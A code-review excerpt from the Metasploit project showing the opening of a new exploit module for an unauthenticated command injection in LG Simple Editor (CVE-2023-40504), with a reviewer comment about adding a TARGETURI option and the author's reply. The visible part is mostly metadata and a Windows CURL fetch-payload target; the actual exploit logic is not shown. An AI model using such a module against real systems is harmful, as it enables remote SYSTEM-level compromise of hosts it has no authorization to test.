modules/exploits/windows/http/lg_simple_editor_rce_uploadvideo.rb

```diff
@@ -0,0 +1,113 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'LG Simple Editor Command Injection (CVE-2023-40504)',
+        'Description' => %q{
+          Unauthenticated Command Injection in LG Simple Editor <= v3.21.0.
+          The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'rgod', # Vulnerability discovery
+          'Michael Heinzl' # MSF module
+        ],
+        'References' => [
+          [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-1208/'],
+          [ 'CVE', '2023-40504']
+        ],
+        'DisclosureDate' => '2023-08-04',
+        'Platform' => 'win',
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Windows_Fetch',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => 'win',
+              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },
+              'Type' => :win_fetch,
+              'Payload' => {
+                'BadChars' => '\\'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8080)
```

Comment:
I have seen that the [other module](https://github.com/rapid7/metasploit-framework/blob/233f6dc4d284e80102db84d972511ab9641234d6/modules/exploits/windows/http/lg_simple_editor_rce.rb#L56) has a `TARGETURI` option.
While I don't see any option inside the LG SimpleEditor to change the base path, I am thinking some scenarios where this option could be useful, for example if we are trying to achieve an RCE to a target over a [Path-Based HAProxy](https://www.haproxy.com/blog/path-based-routing-with-haproxy) configuration.

Reply:
Thank you for pointing that out, I've added the `TARGETURI` option as suggested.